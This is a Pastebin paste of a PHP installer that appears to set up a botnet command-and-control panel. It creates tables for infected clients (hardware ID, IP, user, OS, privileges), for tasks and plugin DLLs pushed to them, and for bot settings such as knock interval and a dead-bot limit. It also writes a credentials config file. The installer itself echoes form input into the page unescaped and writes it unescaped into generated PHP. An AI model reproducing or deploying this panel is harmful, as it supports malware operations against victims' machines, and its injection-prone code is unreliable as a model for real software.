API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 28th, 2019
111
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 13.52 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3.  
  4. function AddrType($IPAddress)
  5. {
  6.     if (ip2long($IPAddress) !== false) {
  7.         return 'ipv4';
  8.     }
  9.  
  10.     if (preg_match('/^[0-9a-fA-F:]+$/', $IPAddress) && inet_pton($IPAddress)) {
  11.         return 'ipv6';
  12.     }
  13.  
  14.     return 'unknown';
  15. }
  16.  
  17. function ImportCSV($conn)
  18. {
  19.     $File = fopen('geoip.csv', 'r');
  20.  
  21.     if (is_resource($File)) {
  22.         $conn->beginTransaction();
  23.         $q = $conn->prepare('INSERT INTO GeoIP (addr_type, ip_start, ip_end, country) VALUES (:addr_type, :start, :end, :country)');
  24.  
  25.         while ($r = fgetcsv($File)) {
  26.             $addr_type = addrtype($r[0]);
  27.             $start = inet_pton($r[0]);
  28.             $end = inet_pton($r[1]);
  29.             $country = $r[2];
  30.             $q->execute(array(':addr_type' => $addr_type, ':start' => $start, ':end' => $end, ':country' => $country));
  31.         }
  32.  
  33.         $conn->commit();
  34.         fclose($File);
  35.         return true;
  36.     }
  37.  
  38.     return false;
  39. }
  40.  
  41. function Output($str)
  42. {
  43.     echo $str;
  44.     ob_flush();
  45. }
  46.  
  47. function Install(&$pResult, $MySQLHost, $MySQLUser, $MySQLPw, $DBName, $User, $UserPw, $Key1, $Key2, $activationCode)
  48. {
  49.     $Result = '';
  50.     $Ret = false;
  51.  
  52.     try {
  53.         $Result .= 'Connecting...<br/>';
  54.         $conn = new PDO('mysql:host=' . $MySQLHost . ';dbname=' . $DBName, $MySQLUser, $MySQLPw);
  55.         $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
  56.         $Result .= 'Selecting database<br/>';
  57.         $conn->exec('USE ' . $DBName);
  58.         $Result .= 'Creating table (Clients)<br/>';
  59.         $sql = 'CREATE TABLE `clients` (' . "\r\n" . '  `hwid` varchar(255) NOT NULL,' . "\r\n" . '  `ip` varchar(32) NOT NULL,' . "\r\n" . '  `cc` varchar(10) NOT NULL,' . "\r\n" . '  `user` varchar(255) CHARACTER SET utf16le NOT NULL,' . "\r\n" . '  `os` int(6) NOT NULL,' . "\r\n" . '  `cpu` varchar(255) NOT NULL,' . "\r\n" . '  `user_privileges` tinyint(1) NOT NULL,' . "\r\n" . '  `install_date` int(128) NOT NULL,' . "\r\n" . '  `group_name` varchar(255) NOT NULL,' . "\r\n" . '  `status` tinyint(1) NOT NULL,' . "\r\n" . '  `last_check` int(128) NOT NULL' . "\r\n" . ');';
  60.         $conn->exec($sql);
  61.         $Result .= 'Creating table (Tasks)<br/>';
  62.         $sql = 'CREATE TABLE `tasks` (' . "\r\n" . '  `hwid` varchar(255) NOT NULL,' . "\r\n" . '  `task` int(2) NOT NULL,' . "\r\n" . '  `task_name` varchar(255) NOT NULL,' . "\r\n" . '  `parameter` varchar(255) NOT NULL,' . "\r\n" . '  `options` varchar(10) NOT NULL,' . "\r\n" . '  `creation_date` int(32) NOT NULL,' . "\r\n" . '  `expiration_date` int(32) NOT NULL,' . "\r\n" . '  `execution_date` int(32) NOT NULL,' . "\r\n" . '  `on_connect_task` int(2) NOT NULL,' . "\r\n" . '  `apply_to_all` int(2) NOT NULL,' . "\r\n" . '  `client_limit` int(255) NOT NULL,' . "\r\n" . '  `status` int(2) NOT NULL' . "\r\n" . ');';
  63.         $conn->exec($sql);
  64.         $Result .= 'Creating table (Plugins)<br/>';
  65.         $sql = 'CREATE TABLE `plugins` (' . "\r\n" . '  `guid` varchar(128) NOT NULL,' . "\r\n" . '  `name` varchar(255) NOT NULL,' . "\r\n" . '  `icon` varchar(255) NOT NULL,' . "\r\n" . '  `description` text NOT NULL,' . "\r\n" . '  `version` int(10) NOT NULL,' . "\r\n" . '  `has_dll` int(2) NOT NULL' . "\r\n" . ');';
  66.         $conn->exec($sql);
  67.         $Result .= 'Creating table (Settings)<br/>';
  68.         $sql = 'CREATE TABLE `settings` (' . "\r\n" . '  `id` int(2) NOT NULL,' . "\r\n" . '  `version` varchar(24) CHARACTER SET ascii NOT NULL COMMENT \'version of bot\',' . "\r\n" . '  `disable_gates` int(1) NOT NULL,' . "\r\n" . '  `securecode` varchar(16) CHARACTER SET ascii NOT NULL COMMENT \'security code for login page\',' . "\r\n" . '  `created` int(11) NOT NULL COMMENT \'date created (UNIX)\',' . "\r\n" . '  `absent_limit` smallint(6) NOT NULL COMMENT \'Max # of days before being marked dead\',' . "\r\n" . '  `knock_interval` mediumint(8) UNSIGNED NOT NULL COMMENT \'Knock interval (in minutes) for bots\',' . "\r\n" . '  `cache_plugins` int(1) NOT NULL,' . "\r\n" . '  `settings_updated` int(32) NOT NULL);';
  69.         $conn->exec($sql);
  70.         $Result .= 'Creating table (Users)<br/>';
  71.         $sql = 'CREATE TABLE `users` (' . "\r\n" . '  `username` varchar(256) NOT NULL,' . "\r\n" . '  `password` varchar(256) NOT NULL,' . "\r\n" . '  `salt` varchar(256) NOT NULL,' . "\r\n" . '  `last_login` int(128) NOT NULL' . "\r\n" . ');';
  72.         $conn->exec($sql);
  73.         $Result .= 'Creating table (GeoIP)<br/>';
  74.         $sql = 'CREATE TABLE IF NOT EXISTS GeoIP (' . "\r\n" . '                        addr_type enum(\'ipv4\', \'ipv6\') NOT NULL,' . "\r\n" . '                        ip_start varbinary(16) NOT NULL ,' . "\r\n" . '                        ip_end varbinary(16) NOT NULL ,' . "\r\n" . '                        country char(2) NOT NULL ,' . "\r\n" . '                        PRIMARY KEY (ip_start)' . "\r\n" . '                        );';
  75.         $conn->exec($sql);
  76.         $Result .= 'Default values...<br/>';
  77.         $pr = $conn->prepare('INSERT INTO users ( ' . "\r\n\t\t\t\t\t" . 'username, ' . "\r\n\t\t\t\t\t" . 'password, ' . "\r\n\t\t\t\t\t" . 'salt, ' . "\r\n\t\t\t\t\t" . 'last_login' . "\r\n\t\t\t\t" . ') VALUES ( ' . "\r\n\t\t\t\t\t" . ':username, ' . "\r\n\t\t\t\t\t" . ':password, ' . "\r\n\t\t\t\t\t" . ':salt, ' . "\r\n\t\t\t\t\t" . ':last_login' . "\r\n\t\t\t\t" . ')');
  78.         $salt = dechex(mt_rand(0, 2147483647)) . dechex(mt_rand(0, 2147483647));
  79.         $password = hash('sha256', $UserPw . $salt);
  80.         $round = 0;
  81.  
  82.         while ($round < 65536) {
  83.             $password = hash('sha256', $password . $salt);
  84.             ++$round;
  85.         }
  86.  
  87.         $pr->execute(array(':username' => $User, ':password' => $password, ':salt' => $salt, ':last_login' => 0));
  88.         $pr = $conn->prepare('INSERT INTO `settings` (`id`, `version`, `disable_gates`, `securecode`, `created`, `absent_limit`, `knock_interval`, `cache_plugins`, `settings_updated`) ' . "\r\n\t\t\t\t\t\t\t\t\t" . 'VALUES (1, \'\', 0, \'\', 0, 7, 1, 0, 0);');
  89.         $pr->execute();
  90.         $Internal = '<?php' . "\r\n\t" . 'require_once("DBG.php");' . "\r\n\t\r\n\t" . '$db_username = "' . $MySQLUser . '"; ' . "\r\n" . '    $db_password = "' . $MySQLPw . '"; ' . "\r\n" . '    $db_host = "' . $MySQLHost . '"; ' . "\r\n" . '    $db_name = "' . $DBName . '"; ' . "\r\n\t\r\n\t" . '$db_options = array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES utf8"); ' . "\r\n" . '    ' . "\r\n\t" . 'define("KEY_1", "' . $Key1 . '");' . "\r\n\t" . 'define("KEY_2", "' . $Key2 . '");' . "\r\n\t" . 'define("ACTIVATION_CODE", "' . $activationCode . '");' . "\r\n\t" . 'try ' . "\r\n" . '    { ' . "\r\n" . '       $db = new PDO("mysql:host={$db_host};dbname={$db_name};charset=utf8", $db_username, $db_password, $db_options); ' . "\r\n" . '    } ' . "\r\n" . '    catch(PDOException $ex) ' . "\r\n" . '    { ' . "\r\n\t\t" . 'DEBUG_PRINT("Failed to connect to the database: " . $ex->getMessage());' . "\r\n\t" . '} ' . "\r\n\t\r\n" . '    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); ' . "\r\n" . '    $db->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); ' . "\r\n" . '    ' . "\r\n\t" . 'if(function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc()) ' . "\r\n" . '    { ' . "\r\n" . '        function undo_magic_quotes_gpc(&$array) ' . "\r\n" . '        { ' . "\r\n" . '            foreach($array as &$value) ' . "\r\n" . '            { ' . "\r\n" . '                if(is_array($value)) ' . "\r\n" . '                { ' . "\r\n" . '                    undo_magic_quotes_gpc($value); ' . "\r\n" . '                } ' . "\r\n" . '                else ' . "\r\n" . '                { ' . "\r\n" . '                    $value = stripslashes($value); ' . "\r\n" . '                } ' . "\r\n" . '            } ' . "\r\n" . '        } ' . "\r\n" . '     ' . "\r\n" . '        undo_magic_quotes_gpc($_POST); ' . "\r\n" . '        undo_magic_quotes_gpc($_GET); ' . "\r\n" . '        undo_magic_quotes_gpc($_COOKIE); ' . "\r\n" . '    } ' . "\r\n\t\r\n\t" . 'function IsValidIP($IP)' . "\r\n\t" . '{' . "\r\n\t\t" . 'if (filter_var($IP, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 | FILTER_FLAG_IPV6 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === FALSE) ' . "\r\n\t\t" . '{' . "\r\n\t\t\t" . 'return false;' . "\r\n\t\t" . '}' . "\r\n\r\n\t\t" . 'return true;' . "\r\n\t" . '}' . "\r\n\t\r\n\t" . 'function GetIPAddress() ' . "\r\n\t" . '{' . "\r\n\t\t" . '$IPKeys = array("HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_X_CLUSTER_CLIENT_IP", "HTTP_FORWARDED_FOR", "HTTP_FORWARDED", "REMOTE_ADDR");' . "\r\n\t\t" . 'foreach ($IPKeys as $Key) ' . "\r\n\t\t" . '{' . "\r\n\t\t\t" . 'if (array_key_exists($Key, $_SERVER) === true) ' . "\r\n\t\t\t" . '{' . "\r\n\t\t\t\t" . 'foreach (explode(",", $_SERVER[$Key]) as $IP) ' . "\r\n\t\t\t\t" . '{' . "\r\n\t\t\t\t\t" . '$IP = trim($IP);' . "\r\n\t\t\t\t\t" . 'if (IsValidIP($IP))' . "\r\n\t\t\t\t\t" . '{' . "\r\n\t\t\t\t\t\t" . 'return $IP;' . "\r\n\t\t\t\t\t" . '}' . "\r\n\t\t\t\t" . '}' . "\r\n\t\t\t" . '}' . "\r\n\t\t" . '}' . "\r\n\r\n\t\t" . 'return isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : false;' . "\r\n\t" . '}' . "\r\n\t\r\n\t" . '// Change this to your timezone' . "\r\n\t" . 'date_default_timezone_set("UTC");' . "\r\n\t\r\n" . '    header("Content-Type: text/html; charset=utf-8"); ' . "\r\n\t\r\n" . '    session_start(); ' . "\r\n" . '?>';
  91.         $Result .= 'Creating internal file<br/>';
  92.         //chmod('../include', 511);
  93.         $File = fopen('../include/internal.php', 'w');
  94.  
  95.         if ($File) {
  96.             fwrite($File, $Internal);
  97.             fclose($File);
  98.         }
  99.         else {
  100.             throw new Exception('Unable to create the internal file. Verify permissions for folder \'/include/\'.<br/>');
  101.         }
  102.  
  103.         //chmod('../include', 493);
  104.         $Result .= 'Importing Geo IP<br/>';
  105.         importcsv($conn);
  106.         $Result .= 'Installed successfully, delete setup directory from server!<br/>';
  107.         $Ret = true;
  108.         $conn = NULL;
  109.     }
  110.     catch (Exception $e) {
  111.         $conn = NULL;
  112.         $Result .= $e->getMessage();
  113.     }
  114.  
  115.     return $Ret;
  116. }
  117.  
  118. set_time_limit(10 * 60);
  119.  
  120. if (isset($_POST['setup_submit'])) {
  121.     $ret = false;
  122.     $result = '';
  123.     if (!(isset($_POST['mysql_host']) && (0 < strlen($_POST['mysql_host'])))) {
  124.         $result = 'Host is required';
  125.     }
  126.     else {
  127.         if (!(isset($_POST['mysql_user']) && (0 < strlen($_POST['mysql_user'])))) {
  128.             $result = 'User is required';
  129.         }
  130.         else {
  131.             if (!(isset($_POST['database_name']) && (0 < strlen($_POST['database_name'])))) {
  132.                 $result = 'Database is required';
  133.             }
  134.             else {
  135.                 if (!(isset($_POST['username']) && (0 < strlen($_POST['username'])))) {
  136.                     $result = 'Username is required';
  137.                 }
  138.                 else {
  139.                     if (!(isset($_POST['user_password']) && (0 < strlen($_POST['user_password'])))) {
  140.                         $result = 'Password is required';
  141.                     }
  142.                     else {
  143.                         $ret = install($result, $_POST['mysql_host'], $_POST['mysql_user'], $_POST['mysql_password'], $_POST['database_name'], $_POST['username'], $_POST['user_password'], $_POST['key1'], $_POST['key2'], $_POST['activation_code']);
  144.                     }
  145.                 }
  146.             }
  147.         }
  148.     }
  149. }
  150.  
  151. echo "\r\n" . '<head>' . "\r\n" . '</head>' . "\r\n" . '<html>' . "\r\n" . '    <h2 align="center"> Setup information </h1>' . "\r\n" . '    <br/>' . "\r\n" . '    ' . "\r\n" . '    <!-- checking error or success -->' . "\r\n" . '    ';
  152.  
  153. if (isset($ret) && isset($result) && strlen($result)) {
  154.     if ($ret == true) {
  155.         $clr = 'green';
  156.     }
  157.     else {
  158.         $clr = 'red';
  159.     }
  160.  
  161.     echo '<div style=\'width: 100%; text-align: center; color: ' . $clr . '\' >' . $result . '</div><br/>';
  162. }
  163.  
  164. echo '    ' . "\r\n" . '    <form action=\'\' method=\'post\'>' . "\r\n" . '        <div align=\'center\'>' . "\r\n" . '            SQL Host: <br/> ' . "\r\n" . '            <input style=\'width:300px\' type=\'text\' name=\'mysql_host\'' . "\r\n" . '            value=\'';
  165. echo isset($_POST['mysql_host']) ? $_POST['mysql_host'] : '';
  166. echo '\'/> <br/> <br/>' . "\r\n" . '            ' . "\r\n" . '            SQL User: <br/> ' . "\r\n" . '            <input style=\'width:300px\' type=\'text\' name=\'mysql_user\'' . "\r\n" . '            value=\'';
  167. echo isset($_POST['mysql_user']) ? $_POST['mysql_user'] : '';
  168. echo '\'/> <br/> <br/>' . "\r\n" . '            ' . "\r\n" . '            SQL Password: <br/>' . "\r\n" . '            <input style=\'width:300px\' type=\'text\' name=\'mysql_password\' value=\'\'/> <br/> <br/>' . "\r\n" . '            ' . "\r\n" . '            Database name: <br/>' . "\r\n" . '            <input style=\'width:300px\' type=\'text\' name=\'database_name\'' . "\r\n" . '            value=\'';
  169. echo isset($_POST['database_name']) ? $_POST['database_name'] : '';
  170. echo '\'/> <br/> <br/>' . "\r\n" . '            ' . "\r\n" . '            Username (Control panel): <br/>' . "\r\n" . '            <input style=\'width:300px\' type=\'text\' name=\'username\'' . "\r\n" . '            value=\'';
  171. echo isset($_POST['username']) ? $_POST['username'] : '';
  172. echo '\'/> <br/> <br/>' . "\r\n" . '            ' . "\r\n" . '            Password (Control panel): <br/>' . "\r\n" . '            <input style=\'width:300px\' type=\'text\' name=\'user_password\' value=\'\'/> <br/><br/>' . "\r\n" . '            ' . "\r\n" . '            Key #1: <br/>' . "\r\n" . '            <input style=\'width:300px\' type=\'text\' name=\'key1\'' . "\r\n" . '            value=\'';
  173. echo isset($_POST['key1']) ? $_POST['key1'] : '';
  174. echo '\'/> <br/> <br/>' . "\r\n" . '            ' . "\r\n" . '            Key #2: <br/>' . "\r\n" . '            <input style=\'width:300px\' type=\'text\' name=\'key2\'' . "\r\n" . '            value=\'';
  175. echo isset($_POST['key2']) ? $_POST['key2'] : '';
  176. echo '\'/> <br/> <br/>' . "\r\n" . '            Activation Code: <br/>' . "\r\n\t\t\t" . '<textarea style=\'width:300px\' rows="8" name=\'activation_code\' value=\'\'>';
  177. echo isset($_POST['activation_code']) ? $_POST['activation_code'] : '';
  178. echo '</textarea>  <br/> <br/>' . "\r\n" . '            <br/>' . "\r\n" . '            <input style=\'width:300px\' type=\'submit\' name=\'setup_submit\' value=\'Install\' action=\'\'/>' . "\r\n" . '        </div>' . "\r\n" . '    </form>' . "\r\n" . '</html>';
  179.  
  180. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!